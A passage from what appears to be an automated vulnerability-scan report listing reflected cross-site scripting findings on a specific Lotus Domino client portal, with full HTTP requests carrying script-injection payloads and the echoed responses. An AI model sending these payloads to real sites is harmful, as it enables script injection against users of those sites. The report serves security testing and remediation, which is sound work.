Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername?OpenForm56101"><script>alert(1)</script>b1838b56821" name="RedirectTo" />
...[SNIP]...

3.97. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd424'%3b10098646869 was submitted in the REST URL parameter 2. This input was echoed as fd424';10098646869 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotusernamefd424'%3b10098646869?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19170
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotusernamefd424';10098646869?openform'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.98. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8450"><script>alert(1)</script>936174fc4c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotusernamed8450"><script>alert(1)</script>936174fc4c8?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19257
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusernamed8450"><script>alert(1)</script>936174fc4c8?OpenForm" name="RedirectTo" />
...[SNIP]...

3.99. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 786d3'-alert(1)-'5d32a6e71ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotusername?OpenForm&786d3'-alert(1)-'5d32a6e71ee=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:36 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:34 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22477
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Username Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
+ cServer
                       }
//                        alert(redir)
                       location = (redir)                
                   }
               }
           }

           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotusername?openform&786d3'-alert(1)-'5d32a6e71ee=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.100. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cb5"><script>alert(1)</script>bd544f0e119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotusername?OpenForm&e1cb5"><script>alert(1)</script>bd544f0e119=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:32 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:30 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22566
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Username Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername?OpenForm&e1cb5"><script>alert(1)</script>bd544f0e119=1" name="RedirectTo" />
...[SNIP]...

3.101. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d6b9'-alert(1)-'068c4f3ccc4 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/ie?OpenForm7d6b9'-alert(1)-'068c4f3ccc4 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:16 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19123
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
nt&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/ie?openform7d6b9'-alert(1)-'068c4f3ccc4'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.102. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 947c9"><script>alert(1)</script>9e8695274cb was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/ie?OpenForm947c9"><script>alert(1)</script>9e8695274cb HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:12 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19183
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie?OpenForm947c9"><script>alert(1)</script>9e8695274cb" name="RedirectTo" />
...[SNIP]...

3.103. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b400f'%3b53b1fc092ed was submitted in the REST URL parameter 2. This input was echoed as b400f';53b1fc092ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/ieb400f'%3b53b1fc092ed?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19110
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
h?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/ieb400f';53b1fc092ed?openform'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.104. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc14"><script>alert(1)</script>9cdacb9fa3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/ie1dc14"><script>alert(1)</script>9cdacb9fa3d?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19209
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie1dc14"><script>alert(1)</script>9cdacb9fa3d?OpenForm" name="RedirectTo" />
...[SNIP]...

3.105. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba6e'-alert(1)-'ee41175a30b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/ie?OpenForm&5ba6e'-alert(1)-'ee41175a30b=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:29 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:27 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 23029
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>New User Registration</title>
   <base href="http://clientcentre.dstglobals
...[SNIP]...
rverNo + '~' + cServer
                       }
//                        alert(redir)
                       location = (redir)                
                   }
               }
           }

           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/ie?openform&5ba6e'-alert(1)-'ee41175a30b=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.106. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f957"><script>alert(1)</script>118bad92d24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/ie?OpenForm&1f957"><script>alert(1)</script>118bad92d24=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:25 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:23 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 23118
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>New User Registration</title>
   <base href="http://clientcentre.dstglobals
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie?OpenForm&1f957"><script>alert(1)</script>118bad92d24=1" name="RedirectTo" />
...[SNIP]...

3.107. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of the OpenIcon request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e8e"><script>alert(1)</script>5dc36f653b2 was submitted in the OpenIcon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/$icon?OpenIconf3e8e"><script>alert(1)</script>5dc36f653b2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19152
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon?OpenIconf3e8e"><script>alert(1)</script>5dc36f653b2" name="RedirectTo" />
...[SNIP]...

3.108. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of the OpenIcon request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ef64'-alert(1)-'ec333ded5e5 was submitted in the OpenIcon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/$icon?OpenIcon1ef64'-alert(1)-'ec333ded5e5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19092
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
o=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/$icon?openicon1ef64'-alert(1)-'ec333ded5e5'
           HTTP_Referer = ''
           RedirectTo = ''

   </script>
...[SNIP]...

3.109. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d6db"><script>alert(1)</script>9f5a6d4b7fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web5d6db"><script>alert(1)</script>9f5a6d4b7fa/framework.nsf/$icon?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19174
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web5d6db"><script>alert(1)</script>9f5a6d4b7fa/framework.nsf/$icon?OpenIcon" name="RedirectTo" />
...[SNIP]...

3.110. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
